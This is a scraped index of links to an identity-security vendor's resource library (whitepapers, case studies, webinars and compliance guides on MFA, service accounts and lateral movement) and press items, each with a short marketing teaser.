- [5 Ways to Step Up Your AD Hygiene with Silverfort](https://www.silverfort.com/resources/five-ways-to-step-up-your-ad-hygiene-with-silverfort/): Keep your Active Directory clean, secure, and attack-resilient. Your Active Directory (AD) is a goldmine for attackers, and one weak...
- [Today's Top 4 Identity Security Threat Exposures: Are You Vulnerable?](https://www.silverfort.com/resources/todays-top-4-identity-security-threat-exposures-are-you-vulnerable/): When it comes to identity protection, we often focus on what’s visible above the surface – the user accounts and...
- [Fortifying Identity Protection: The Silverfort Identity IR Playbook](https://www.silverfort.com/resources/the-silverfort-identity-ir-playbook/): An organization’s Incident Response Plan (IRP) is the set of processes followed by security teams to respond to an attack....
- [Securing Campus: Solving Identity Protection Gaps in Education Environments](https://www.silverfort.com/resources/solving-identity-protection-gaps-in-education-environments/): The education sector, including both K-12 and higher education, continues to be a high target for cyberattacks. Attack volume has...
- [The Identity Threat Exposure Report](https://www.silverfort.com/resources/the-identity-threat-exposures-report/): Your defenses are sky high, but underground you’re exposed. When it comes to identity protection, the user accounts and configurations...
- [Securing Service Accounts with Silverfort](https://www.silverfort.com/resources/securing-service-accounts-with-silverfort/): Watch this short video about Unified Identity Protection with Silverfort.
- [Silverfort’s Deny Access Policies](https://www.silverfort.com/resources/silverforts-deny-access-policies/): Stop threats before they can start with deny access policies that actually work. When it comes to identity threats, speed...
- [Breaking Through MFA Barriers in Oil & Gas Air-Gapped Networks](https://www.silverfort.com/resources/breaking-through-mfa-barriers-in-oil-gas-air-gapped-networks/): Today’s interconnected world has made the cybersecurity landscape increasingly complex, particularly for industries such as oil and gas. Ransomware attacks...
- [Building an Incident Response Playbook Against Scattered Spider in Real-Time](https://www.silverfort.com/resources/building-an-incident-response-playbook-against-scattered-spider-in-real-time/): In late 2023, the Scattered Spider threat group attacked the networks of several major financial and insurance entities, resulting in...
- [How Silverfort Secures Former Employee Accounts](https://www.silverfort.com/resources/how-silverfort-secures-former-employee-accounts/): Many organizations spend a lot of time onboarding new employees and making sure they have access to everything they need;...
- [Silverfort Identity Protection for NY-DFS 23 NYCRR Part 500](https://www.silverfort.com/resources/identity-protection-for-ny-dfs-part-500/): In this white paper, we explore how Silverfort enables organizations that are subject to NY-DFS cybersecurity regulation to fully meet...
- [PCI DSS v4.0 Compliance with Silverfort Identity Protection](https://www.silverfort.com/resources/pci-dss-v4-compliance-with-silverfort-identity-protection/): Get PCI DSS v4.0 ready—faster, smarter, and without the headache. PCI DSS 3.2.1 is officially retired, and...
- [Comply with Digital Operational Resilience Act (DORA) Requirements with Silverfort](https://www.silverfort.com/resources/comply-with-digital-operational-resilience-act-requirements-with-silverfort/): Make DORA compliance simple and secure with Silverfort
- [Comply with CCOP Identity Protection Requirements with Silverfort](https://www.silverfort.com/resources/comply-with-ccop-identity-protection-requirements-with-silverfort/): In this solution brief, we explore how Silverfort enables operators of critical infrastructure in Singapore to align with the updated...
- [Facing and Overcoming Retail Identity Protection Challenges](https://www.silverfort.com/resources/facing-and-overcoming-retail-identity-protection-challenges/): As retailers compete in an increasingly competitive marketplace, they invest a great deal of resources in becoming household names. But...
- [Identity Attack Surface Key Weakness Analysis Redux: Shifting from On-Prem to Cloud](https://www.silverfort.com/resources/identity-attack-surface-key-weakness-analysis-redux-shifting-from-on-prem-to-cloud/): It’s no surprise that modern cyberattacks are looking for ways to move laterally both within an on-premises environment, as well...
- [Identity Security in Healthcare: Challenges and Solutions](https://www.silverfort.com/resources/identity-protection-in-healthcare-challenges-and-solutions/): Identity threats are frequently targeted at healthcare organizations, resulting in serious injuries and disruptions to emergency services. Silverfort provides unified...
- [Data#3 and Silverfort: Westminster School Case Study](https://www.silverfort.com/resources/westminster-school-with-data3/): Westminster School finds “missing piece” of security strategy with Data#3 and Silverfort. Westminster School counts cyber security among the most...
- [State of Emergency: Identity Security Blind Spots Endanger Healthcare Services](https://www.silverfort.com/resources/state-of-emergency-identity-security-blind-spots-endanger-healthcare-services/): Healthcare organizations are among the most targeted sectors for identity-related attacks as they utilize a wide range of systems and...
- [Silverfort for PingOne DaVinci](https://www.silverfort.com/resources/silverfort-for-pingone-davinci/): Want to instantly act on identity threats—without writing a single line of code? This PDF introduces the powerful integration between...
- [Frequently Asked Questions about Silverfort and Azure Marketplace](https://www.silverfort.com/resources/frequently-asked-questions-about-silverfort-and-azure-marketplace/): Purchasing Silverfort through the Azure Marketplace allows for a streamlined procurement process, allowing you to leverage your existing procurement relationship...
- [Silverfort and ServiceNow Integration](https://www.silverfort.com/resources/silverfort-and-servicenow-integration/): What if your service accounts could protect themselves—without system changes or manual oversight? This PDF explains how Silverfort’s native integration...
- [Securing Manufacturing Environments with Silverfort](https://www.silverfort.com/resources/securing-manufacturing-environments-with-mfa-2/): Manufacturers are more connected than ever, with a rapidly increasing number of manufacturing environments shifting from local user access to...
- [Building an Incident Response Playbook on the Fly Against Scattered Spider Lateral Movement](https://www.silverfort.com/resources/building-an-incident-response-playbook-on-the-fly-against-scattered-spider-lateral-movement/): By now, you’ve likely heard about the largest – and possibly the most impactful – ransomware attack in recent memory...
- [What is Silverfort's Cyber Insurance Assessment?](https://www.silverfort.com/resources/what-is-silverforts-cyber-insurance-assessment/): Struggling to meet identity-related cyber insurance requirements? Silverfort’s free assessment can help you bridge the gap—fast. This whitepaper introduces Silverfort’s...
- [Cyber Essentials and Cyber Essentials Plus – Your Guide to Compliance Through Identity Protection](https://www.silverfort.com/resources/cyber-essentials-and-cyber-essentials-plus/): In this white paper, you will learn how organisations can integrate the Silverfort Unified Identity Protection platform to comply with...
- [Overcoming the Security Blind Spots of Service Accounts](https://www.silverfort.com/resources/overcoming-the-security-blind-spots-of-service-accounts/): In today’s rapidly evolving cybersecurity landscape, service accounts have emerged as a pressing concern for identity and security stakeholders. With...
- [Exploring The Critical Blind Spots of Privileged Access: Service Accounts & MFA in Active Directory](https://www.silverfort.com/resources/exploring-the-critical-blind-spots-of-privileged-access-service-accounts-mfa-in-active-directory/): Privileged access is at the top of the list in every organization’s cybersecurity discussions. With threat actors focusing on credentials...
- [Securing networking devices with Silverfort's MFA protection](https://www.silverfort.com/resources/securing-networking-devices-with-silverfort/): Routers, switches, and firewalls are the backbone of your infrastructure—and the perfect target for attackers. So why leave them out...
- [NEC XON and Silverfort: A Case Study](https://www.silverfort.com/resources/nec-xon-customer-case-study/): Gaining Full Visibility into Authentications and Lateral Movement Prevention. NEC XON Systems is a leading African integrator of ICT solutions...
- [Solving Identity Protection Gaps in Telecom Environments](https://www.silverfort.com/resources/solving-identity-protection-gaps-in-telecom-environments/): The telecom industry keeps the world connected. Whether it is private communications or business interactions, it is an integral component... - [How Silverfort Solves Telecom Identity Protection Challenges](https://www.silverfort.com/resources/how-silverfort-solves-telecom-identity-protection-challenges/): Keeping the world connected is the responsibility of the telecom industry. With the development of technology, the threat landscape of the... - [Silverfort and Microsoft Defender for Identity (MDI)](https://www.silverfort.com/resources/silverfort-and-microsoft-defender-for-identity/): Stop identity-based attacks in real time—across all systems—with Silverfort and Microsoft Defender for Identity (MDI). - [Analysis of the Key Weaknesses and Exposures in the Identity Attack Surface | Silverfort](https://www.silverfort.com/resources/analysis-of-the-key-weaknesses-and-exposures-in-the-identity-attack-surface-silverfort/): If you’ve been paying attention to cyberattack actions, you already know that privileges are the key to an attacker’s success.... - [Silverfort and Yubico Integration](https://www.silverfort.com/resources/silverfort-and-yubico/): What if your YubiKeys could protect not just web apps—but every legacy system, database, and command-line tool too? With the... - [Silverfort and Kayak: A Case Study](https://www.silverfort.com/resources/silverfort-and-kayak-a-case-study/): In this testimonial, Kayak’s Tom Parker, VP of IT & CISO, and Austin Michaels, Security Engineer, explain how Silverfort enabled... 
- [Addressing the Telecommunication Security Framework Requirements for Privileged Accounts](https://www.silverfort.com/resources/addressing-telecommunication-security-framework-requirements-for-privileged-accounts/): This whitepaper specifies how organisations can use the Silverfort Unified Identity Protection platform to implement the identity protection aspect of... - [Silverfort and Huntsville Hospital: A Case Study](https://www.silverfort.com/resources/silverfort-and-huntsville-hospital-a-case-study-2/): In this testimonial, Huntsville Hospital’s Rick Corn, CIO and Ryan Petraszewsky, IT Security Officer discussed how Silverfort helped them to... - [Silverfort Bridging to Entra ID](https://www.silverfort.com/resources/silverfort-bridging-to-entra-id/): What if your legacy apps and on-prem tools could follow the same security policies as your cloud apps? That’s exactly... - [NHS England: MFA Policy Compliance with Silverfort](https://www.silverfort.com/resources/nhs-england-mfa-policy-compliance-with-silverfort/): NHS organisations and contractors are being encouraged to implement multi-factor authentication (MFA) controls for all privileged users and services accessing... - [Osterman Research + Silverfort: The State of the Identity Attack Surface](https://www.silverfort.com/resources/osterman-research-silverfort-the-state-of-the-identity-attack-surface/): Today, organizations depend on digital assets for business, but identity threats pose a critical risk. Attackers persistently target user identities,... - [Identity Zero-Trust: From Vision to Practical Implementation](https://www.silverfort.com/resources/identity-zero-trust-from-vision-to-practical-implementation/): Since its emergence, zero-trust has been commonly associated with rebuilding networking infrastructure security. Silverfort challenges this approach and enables organizations... 
- [Silverfort for Entra ID Sign-In Logs](https://www.silverfort.com/resources/silverfort-for-entra-id-sign-in-logs/): You already have the sign-in data. Silverfort helps you unlock its full security potential. This PDF details how Silverfort’s native... - [Way Too Vulnerable: Uncovering the State of the Identity Attack Surface | Silverfort](https://www.silverfort.com/resources/way-too-vulnerable-uncovering-the-state-of-the-identity-attack-surface-silverfort/): Organizations today rely on digital assets to conduct business, but identity threats have become a critical risk factor. As attackers... - [Silverfort's Unified Identity Protection](https://www.silverfort.com/resources/unified-identity-protection/): Watch this short video about Unified Identity Protection with Silverfort. - [The State of the Identity Attack Surface: An Osterman Research Report](https://www.silverfort.com/resources/the-state-of-the-identity-attack-surface-an-osterman-research-report/): The first comprehensive study on identity threats resilience: why organizations are unable to protect themselves against account takeovers, lateral movement,... - [Solving the MFA Challenge in Oil & Gas Air-Gapped Networks](https://www.silverfort.com/resources/solving-the-mfa-challenge-in-oil-gas-air-gapped-networks/): Oil and Gas companies struggle to keep their air-gapped OT networks safe from identity threats such as lateral movement and... - [Silverfort MFA for Air-Gapped Networks](https://www.silverfort.com/resources/silverfort-mfa-for-air-gapped-networks/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... - [Maribyrnong City Council and Silverfort: A Case Study](https://www.silverfort.com/resources/maribyrnong-city-council-and-silverfort-a-case-study/): Real-Time Visibility into All Access-Related Activity As a prominent governmental entity, the city council of Maribyrnong needed to increase its... 
- [Optix and Silverfort: A Case Study](https://www.silverfort.com/resources/optix-and-silverfort-a-case-study/): Renewed Cyber Insurance Policy and Prevented a Lateral Movement Attack Optix’s cyber insurance provider tightened their requirements for Optix to... - [Identity Zero Trust: How to Move from Vision to Implementation - eBook](https://www.silverfort.com/resources/identity-zero-trust-how-to-move-from-vision-to-implementation-ebook/): Learn why it makes sense to begin with an identity focus when it comes to Zero Trust and how Silverfort... - [Cyber Essentials and Cyber Essentials Plus Certification Assessment](https://www.silverfort.com/resources/cyber-essentials-and-cyber-essentials-plus-certification-assessment/): This whitepaper specifies how organisations can integrate the Silverfort Unified Identity Protection platform to help comply with the Cyber Essentials and... - [Identity Threat Detection and Response (ITDR): Protecting the Exposed Attack Surface](https://www.silverfort.com/resources/identity-threat-detection-and-response-itdr-protecting-the-exposed-attack-surface/): Learn how Silverfort’s Azure AD bridging capability extends Azure AD MFA and Conditional Access to all on-prem resources while configuring... - [Solving the Top Five PAM Challenges of Identity Teams](https://www.silverfort.com/resources/solving-the-top-five-pam-challenges-of-identity-teams/): Learn how Silverfort’s Azure AD bridging capability extends Azure AD MFA and Conditional Access to all on-prem resources while configuring... - [Bridging Legacy Resources From AD to Entra ID (Azure AD)](https://www.silverfort.com/resources/bridging-legacy-resources-from-ad-to-azure-ad-ebook/): Learn how Silverfort’s Azure AD bridging capability extends Azure AD MFA and Conditional Access to all on-prem resources while configuring... 
- [Real-Time MFA and Service Account Protection Can Defeat Ransomware Attacks](https://www.silverfort.com/resources/real-time-mfa-and-service-account-protection-can-defeat-ransomware-attacks/): Lateral movement is the X factor that transforms ransomware attacks from a mere nuisance to an enterprise-level incident. While once... - [Silverfort for Microsoft 365 E5](https://www.silverfort.com/resources/silverfort-for-microsoft-365-e5/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... - [STARCO and Silverfort: A Case Study](https://www.silverfort.com/resources/starco-and-silverfort-a-case-study/): Extending MFA Protection to All Users and Resources Understanding the security risks of identity-based attack methods that are commonly used... - [Re-Evaluate Your MFA Protection - eBook](https://www.silverfort.com/resources/reevaluate-your-mfa-protection-ebook-ug/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... - [Major Multinational Bank Extends Custom MFA to Legacy Applications](https://www.silverfort.com/resources/major-multinational-bank-extends-custom-mfa-to-legacy-applications/): Extending MFA Protection to Legacy Applications This case study examines an important issue faced by many financial institutions: How to... - [Discover and Protect Service Accounts](https://www.silverfort.com/resources/silverfort-service-accounts-solution-brief/): Silverfort automates the discovery, access control and protection of all service accounts in the environment, providing organizations with granular visibility... - [Securing Manufacturing Environments with MFA](https://www.silverfort.com/resources/securing-manufacturing-environments-with-mfa/): In this e-book you’ll learn the core components of lateral movement attacks and understand why they are a blind spot... 
- [Solving the Lateral Movement Protection Blind Spot with Identity Threat Detection and Response (ITDR)](https://www.silverfort.com/resources/solving-the-lateral-movement-protection-blind-spot-with-identity-threat-detection-and-response-itdr/): In this e-book you’ll learn the core components of lateral movement attacks and understand why they are a blind spot... - [Understanding Cyber Insurance Identity Security Requirements for 2023](https://www.silverfort.com/resources/understanding-cyber-insurance-identity-security-requirements-for-2023/): The practice of cyber insurance has gained momentum during the last decade and is now a common necessity for organizations... - [Silverfort & Microsoft: Extending Azure MFA to All Resources That Couldn’t Be Protected Before](https://www.silverfort.com/resources/silverfort-microsoft-extending-azure-mfa-to-all-resources-that-couldnt-be-protected-before/): Think Entra MFA stops at the cloud? Silverfort proves it doesn’t have to. This solution brief reveals how Silverfort supercharges... - [Silverfort & Microsoft AD FS Integration](https://www.silverfort.com/resources/silverfort-and-microsoft-ad-fs-integration/): Think AD FS can’t protect your legacy systems or on-prem servers with MFA? Think again. This PDF shows how Silverfort... - [Top Identity Protection Challenges for Manufacturing Organizations](https://www.silverfort.com/resources/top-identity-protection-challenges-for-manufacturing-organizations/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... - [Silverfort MFA: Protect the Unprotectable](https://www.silverfort.com/resources/silverfort-mfa-protect-the-unprotectable/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... 
- [Bounce the Ticket and Silver Iodide on Azure AD Kerberos](https://www.silverfort.com/resources/bounce-the-ticket-and-silver-iodide-on-azure-ad-kerberos/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... - [Lateral Movement Prevention with MFA and Service Account Protection](https://www.silverfort.com/resources/lateral-movement-prevention-with-mfa-and-service-account-protection/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... - [Accelerate Your Privileged Access Management (PAM) Journey](https://www.silverfort.com/resources/accelerate-your-privileged-access-management-pam-journey/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... - [Extending Entra ID (formerly Azure AD), MFA, and Conditional Access to On-Prem Resources](https://www.silverfort.com/resources/silverfort-microsoft-azure-ad-extending-azure-mfa-to-unprotected-systems/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... - [Extending Azure AD, MFA, and Conditional Access to On-Prem Resources](https://www.silverfort.com/resources/extending-azure-ad-mfa-and-conditional-access-to-on-prem-resources/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... - [Silverfort & Microsoft 365 Defender: Unified XDR & Identity Threat Protection](https://www.silverfort.com/resources/silverfort-microsoft-365-defender-unified-xdr-identity-threat-protection/): Today’s data breaches and ransomware attacks often include two key components – exploiting the endpoint and using compromised credentials to... 
- [Silverfort & Duo: Extending MFA to corporate resources that couldn’t be protected before](https://www.silverfort.com/resources/silverfort-duo-extending-mfa-to-corporate-resources-that-couldnt-be-protected-before/): This solution brief explores how Silverfort’s native integration with Duo extends MFA protection to previously unprotectable parts of your infrastructure,... - [Silverfort & RSA: Extending MFA to all resources](https://www.silverfort.com/resources/silverfort-rsa-extends-mfa-protection-to-all-resources-in-the-cloud-and-on-prem/): RSA SecurID is powerful—but what if it could also protect legacy apps, scripts, and servers that were never designed for... - [The Critical Role of Identity in Zero Trust Security](https://www.silverfort.com/resources/the-critical-role-of-identity-in-zero-trust-security/): The Zero Trust approach to cyber security was formulated to defend all users and applications from Internet and identity-based attacks.... - [Leading Manufacturer Averted Lateral Movement: A Case Study](https://www.silverfort.com/resources/leading-manufacturer-averted-lateral-movement/): Identity Protection: A Top Priority This case study discusses a supply chain cyber incident where a leading manufacturer was attacked... - [Analyze AD Traffic with the Lateral Movement Analyzer Tool (Beta)](https://www.silverfort.com/resources/lateral-movement-analyzer-tool-beta/): Domain Controllers are the nerve system of your enterprise. Silverfort's vulnerability assessment tool enables you to discover all DCs in... - [Agilisys and Silverfort: A Case Study](https://www.silverfort.com/resources/agilisys-and-silverfort-case-study/): Extending MFA Protection Across All Environments: Agilisys was looking to ensure sufficient MFA protection for all its environments and interfaces,... 
- [ZOL and Silverfort](https://www.silverfort.com/resources/zol-and-silverfort-a-case-study/): When ZOL hospital in Belgium needed to protect its service accounts from attack with minimal disruption, they turned to Silverfort. - [RWC and Silverfort: A Case Study](https://www.silverfort.com/resources/rwc-and-silverfort-a-case-study/): Reliance Worldwide Corporation is a publicly-traded leading manufacturer. Like many companies of its size, RWC cannot afford delays in production... - [Silverfort App for Splunk](https://www.silverfort.com/resources/silverfort-app-for-splunk/): The Silverfort App for Splunk brings advanced identity threat intelligence directly into your SOC’s existing workflows. This PDF breaks down... - [Best Practices for Service Accounts](https://www.silverfort.com/resources/whitepaper-service-accounts-best-practices/): Your service accounts are a security blind spot. Here’s how to fix that. - [The Essential Eight Maturity Model](https://www.silverfort.com/resources/the-essential-eight-maturity-model/): This whitepaper specifies how organisations can use the Silverfort Unified Identity Protection platform to implement the identity protection aspect of... - [Silverfort & SentinelOne: Identity Threat Protection](https://www.silverfort.com/resources/silverfort-sentinelone-identity-threat-protection/): What if your XDR platform could detect identity-based threats—and your identity tools could respond to endpoint attacks? With Silverfort and... - [Silverfort for Windows Login](https://www.silverfort.com/resources/silverfort-for-windows-login/): Protect every Windows login with adaptive MFA from Silverfort If attackers can log in, they can break in. So why... 
- [Help Your Clients Qualify for Cyber Insurance Coverage With Silverfort](https://www.silverfort.com/resources/help-your-clients-qualify-for-cyber-insurance-coverage-with-silverfort/): Silverfort enables clients to easily meet the new cyber insurance requirements for MFA protection across all sensitive systems, both on-prem... - [Implementing MFA for Cyber Insurance Made Easy with Silverfort](https://www.silverfort.com/resources/implementing-mfa-for-cyber-insurance-made-easy-with-silverfort/): The new requirement for MFA protection introduces a severe challenge to organizations of all sizes since standard MFA solutions cannot... - [Silverfort & HYPR: Extending Passwordless MFA To All Resources Within Your Environments](https://www.silverfort.com/resources/silverfort-hypr-extending-passwordless-mfa-to-all-resources-within-your-environments/): What if you could apply HYPR’s passwordless MFA to every app, server, and command-line tool—without touching a single one? The... - [IndoSat and Silverfort: A Case Study](https://www.silverfort.com/resources/indosat-and-silverfort-a-case-study/): IndoSat explains how Silverfort addresses their concerns about identity-based attacks by providing continuous visibility and real-time risk analysis across all... - [Privileged Accounts Protection Reborn with Silverfort](https://www.silverfort.com/resources/privileged-accounts-protection-reborn-with-silverfort/): Creating easily implemented MFA policies for all your privileged accounts is the only way to ensure they are not compromised.... - [Egan and Silverfort: A Case Study](https://www.silverfort.com/resources/egan-and-silverfort-a-case-study/): In this testimonial from Egan, they discuss how Silverfort enabled them to extend their coverage to assets that could not... 
- [Webinar-The Journey to Identity-Centric Zero Trust Architecture](https://www.silverfort.com/resources/webinar-the-journey-to-identity-centric-zero-trust-architecture/): More and more organizations acknowledge the implementation of Zero Trust in the identity control plane as the best protection against... - [How to Comply with the Cyber Insurance MFA Checklist](https://www.silverfort.com/resources/cyber-insurance-ebook/): Everyone knows the value of cyber insurance but keeping up with cyber insurance requirements can be tricky. As ransomware attacks... - [Silverfort MFA: Protect the Unprotectable – White Paper](https://www.silverfort.com/resources/silverfort-mfa-protect-the-unprotectable-white-paper/): The Silverfort MFA solution represents a fundamentally different approach to identity protection, providing MFA coverage to all enterprise resources –... - [MAS Risk Management Guidelines – Silverfort White Paper](https://www.silverfort.com/resources/mas-risk-management-guidelines-silverfort-white-paper/): The Monetary Authority of Singapore has revised its risk management guidelines to reduce the risk of identity-based attacks. Financial institutions... - [Re-Evaluate Your MFA Protection – eBook](https://www.silverfort.com/resources/re-evaluate-your-mfa-protection-ebook/): MFA protection is ultimately only as strong as its weakest link. Without an MFA deployment that covers all organizational resources,... - [eBook – The Dark Side of Ransomware Protection](https://www.silverfort.com/resources/rethinking-ransomware-protection/): Learn why ransomware propagation is often a blind spot for today’s security products, and how emerging Unified Identity Protection technology... 
- [Unified Risk Analysis Across Cloud and Hybrid Environments with Ping Identity](https://www.silverfort.com/resources/unified-risk-analysis-ping-id/): Silverfort’s Unified Risk Analysis across cloud and hybrid environments detects and prevents identity-based attacks with comprehensive risk analysis and adaptive... - [Multi-Factor Authentication: Not Just for Admins](https://www.silverfort.com/resources/mfa-not-just-for-admins/): Many believe that MFA is needed only for privileged accounts. This misconception can have far-reaching consequences, as recent events have... - [Discover Critical Identity Vulnerabilities with Silverfort’s Vulnerability Assessment Tool](https://www.silverfort.com/resources/discover-critical-identity-vulnerabilities/): Domain Controllers are the nerve system of your enterprise. Silverfort's vulnerability assessment tool enables you to discover all DCs in... - [Introducing Unified Identity Protection (German Subtitles)](https://www.silverfort.com/resources/introducing-unified-identity-protection-german/): Watch this short video about Unified Identity Protection, the first security solution that is purpose-built to secure modern enterprises against... - [Improving Cybersecurity with Unified Identity Protection](https://www.silverfort.com/resources/improving-cybersecurity-with-unified-identity-protection/): Following recent cybersecurity incidents such as SolarWinds, Microsoft Exchange, and the Colonial Pipeline incident, President Biden signed on May 21st,... - [Can You Block Lateral Movement In Real Time?](https://www.silverfort.com/resources/can-you-block-lateral-movement-in-real-time-3/): Watch the On Demand webinar to learn the difference between standard and advanced attacks, and why security solutions often fail... 
- [The Silverfort Identity Security Platform](https://www.silverfort.com/resources/silverfort-unified-identity-protection-overview/): The Silverfort Identity Security Platform closes critical identity security gaps that traditional solutions cannot address. By leveraging our patented Runtime... - [Why Service Accounts and Machine-to-Machine Access Should be Part of Any Zero Trust Initiative](https://www.silverfort.com/resources/thank-you-page-why-service-accounts-and-machine-to-machine-access-should-be-part-of-any-zero-trust-initiative/): With hundreds or even thousands of unsupervised, highly-privileged service accounts running in any modern organization, and given the difficulties of... - [Enabling Cloud Migration with Identity-Based Zero Trust](https://www.silverfort.com/resources/thank-you-page-enabling-cloud-migration-with-identity-based-zero-trust/): Zero Trust security goes beyond the traditional perimeter-based security model, and enables companies to migrate assets outside of their on-premise... - [Risk Analysis and Adaptive Policies in Zero Trust Security](https://www.silverfort.com/resources/risk-analysis-and-adaptive-policies-in-zero-trust-security/): In order to achieve effective Zero Trust security, you have to continuously analyze risk across all users, devices, systems and... - [Why Unified IAM Visibility & Control is Key for Zero Trust Security](https://www.silverfort.com/resources/thank-you-page-why-unified-iam-visibility-control-is-key-for-zero-trust/): Successful Zero Trust implementations focus heavily on telemetry and metrics derived from identities. - [Silverfort’s AI-Driven Risk Engine and Adaptive Authentication](https://www.silverfort.com/resources/silverfort-adaptive-authentication-white-paper/): This white paper reviews the benefits and challenges of adaptive authentication, read more... 
- [Four Simple Steps to Secure Your Service Accounts [30 minutes]](https://www.silverfort.com/resources/thank-you-page-four-simple-steps-to-secure-your-service-accounts-30-minutes-on-demand/): With hundreds or even thousands of unsupervised, highly-privileged service accounts running in modern organizations, they can become high-risk assets. - [Extending YubiKey FIDO2 Hardware Tokens to Any System and Interface with Silverfort](https://www.silverfort.com/resources/thank-you-page-form-extending-yubikey-fido2-hardware-tokens-to-any-system-and-interface-with-silverfort-2/): Now more than ever, organizations need a holistic authentication solution to maximize security without disrupting productivity. - [Partner Spotlight Series: Silverfort talks about meeting customer demands with YubiKey](https://www.silverfort.com/resources/partner-spotlight-series-silverfort-talks-about-meeting-customer-demands-with-the-yubikey/): Silverfort enables customers to seamlessly extend hardware-backed multi-factor authentication (MFA) with YubiKey across all systems ... - [Blocking Identity-Based Threats with Silverfort & Palo Alto Networks Cortex XSOAR](https://www.silverfort.com/resources/thank-you-page-form-blocking-identity-based-threats-with-silverfort-palo-alto-networks-cortex-xsoar-2/): Automate your security operations and response to identity-based threats and behavior anomalies with Silverfort playbooks. - [Securing Service Accounts Without Changing Passwords](https://www.silverfort.com/resources/securing-service-accounts-without-changing-passwords/): Service accounts are a prime target for hackers. However, securing the use of service accounts is a major challenge for... 
- [Silverfort & Okta: Multi-factor authentication for desktops and systems across the enterprise](https://www.silverfort.com/resources/okta-silverfort-multi-factor-authentication-for-desktops-and-systems-across-the-enterprise/): Silverfort’s integration with Okta extends your MFA coverage to the places it’s traditionally never reached—like legacy applications, command-line tools, file... - [Can You Detect and Block the Evasive Threat of Lateral Movement?](https://www.silverfort.com/resources/can-you-detect-and-block-the-evasive-threat-of-lateral-movement/): After penetrating the network, hackers use various lateral movement techniques to gain access to their target systems and data. In... - [Is Remote Access Putting Your Organization at Risk?](https://www.silverfort.com/resources/thank-you-page-form-is-remote-access-putting-your-organization-at-risk/): Recent events forced us to change the way we work and today most employees are working remotely. While enabling remote... - [Enabling Secure Remote Access Everywhere](https://www.silverfort.com/resources/secure-remote-access/): Silverfort enables frictionless secure authentication for any user, any device and any resource... - [Recorded Session: Enabling Secure Authentication and Zero-Trust](https://www.silverfort.com/resources/recorded-session-enabling-secure-authentication-and-zero-trust/): Dries Robberechts, Director of EMEA Sales, explains how Silverfort enables secure authentication and Zero-Trust in today’s perimeter-less networks - [Silverfort for IT and OT Networks](https://www.silverfort.com/resources/secure-authentication-across-it-and-ot-networks/): Silverfort applies an innovative architecture and a powerful AI-driven risk engine to monitor, analyze and secure all authentication... 
- [Silverfort platform Integration with Azure Active Directory](https://www.silverfort.com/resources/silverfort-platform-integration-with-azure-active-directory/): Silverfort integrates with Azure Active Directory directly to influence conditional access policies in Azure AD in real-time and to deliver unified... - [Next Generation Authentication for Financial Services](https://www.silverfort.com/resources/next-generation-authentication-for-financial-services/): Cybersecurity is a top concern for banks, insurance companies, investment funds and other... - [Silverfort & Check Point Joint Solution Brief](https://www.silverfort.com/resources/threat-driven-multifactor-authentication-check-point-silverfort-solution-brief/): Learn how to prevent attacks without blocking legitimate users with dynamic MFA policies - [Protecting the Unprotectable](https://www.silverfort.com/resources/silverfort-product-overview/): Silverfort enables adaptive multi-factor authentication across entire corporate networks, industrial and cloud environments, from a... - [[Japanese] Introduction to Silverfort](https://www.silverfort.com/resources/japanese-introduction-to-silverfort/): In this video, Hed Kovetz, CEO and Co-Founder, introduces the Silverfort agentless authentication platform to the Japanese market. --- ## News and press - [Silverfort unveils AI Agent Security to protect agentic identities, securing MCP deployments with inline, dynamic security controls](https://www.silverfort.com/press-news/silverfort-unveils-ai-agent-security/): Identity and access security layer gives enterprises the confidence to rapidly and securely adopt AI agents and accelerate innovation Boston,... 
- [Silverfort Appoints Howard Greenfield as President & Chief Revenue Officer as Demand for Identity Security Surges](https://www.silverfort.com/press-news/silverfort-appoints-howard-greenfield-president-and-cro/): Former CRO of SailPoint and Centrify joins Silverfort to support the company's rapid growth and identity security market leadership - [10 Hot Cybersecurity Tools Announced At RSAC 2025](https://www.crn.com/news/security/2025/10-hot-cybersecurity-tools-announced-at-rsac-2025#new_tab) - [The recent ransomware attacks on UK retailers all targeted gaps in identity](https://www.scworld.com/perspective/time-for-retailers-to-treat-identity-as-a-core-strategy#new_tab) - [Silverfort expands its Non-Human Identity (NHI) Security offering to the cloud for end-to-end identity security](https://www.silverfort.com/press-news/silverfort-expands-its-non-human-identity-nhi-security-offering/): Only Silverfort secures all human and non-human identities across all environments in a single platform—from workforce identities to workload identities,... 
- [CyberSG TIG Collaboration Centre RSAC 2025 interview: Silverfort’s Hed Kovetz](https://www.scworld.com/resource/cybersg-tig-collaboration-centre-rsac-2025-interview#new_tab) - [5 ways corporate boards can support CISOs in 2025](https://www.scworld.com/perspective/5-ways-corporate-boards-can-support-cisos-in-2025#new_tab) - [Multiple Groups Exploit NTLM Flaw in Microsoft Windows](https://www.darkreading.com/cyberattacks-data-breaches/multiple-group-exploiting-ntlm-flaw#new_tab) - [CISOs are taking on ever more responsibilities and functional roles – has it gone too far?](https://www.csoonline.com/article/3851735/cisos-are-taking-on-ever-more-responsibilities-and-functional-roles-has-it-gone-too-far.html#new_tab) - [Podcast | Why Manufacturing Lags in Protecting Against Cyberattacks](https://www.supplychainbrain.com/articles/41389-podcast-why-manufacturing-lags-in-protecting-against-cyberattacks#new_tab) - [Silverfort Stakes Its Claim in the Identity Security Market with Patented Architecture and Rebrand, as Demand for Identity Security Accelerates](https://www.silverfort.com/press-news/silverfort-stakes-its-claim-in-the-identity-security-market-with-patented-architecture-and-rebrand/): Introducing Runtime Access Protection (RAP) enabling the first end-to-end identity security platform, securing every identity across hybrid environments and disrupting... 
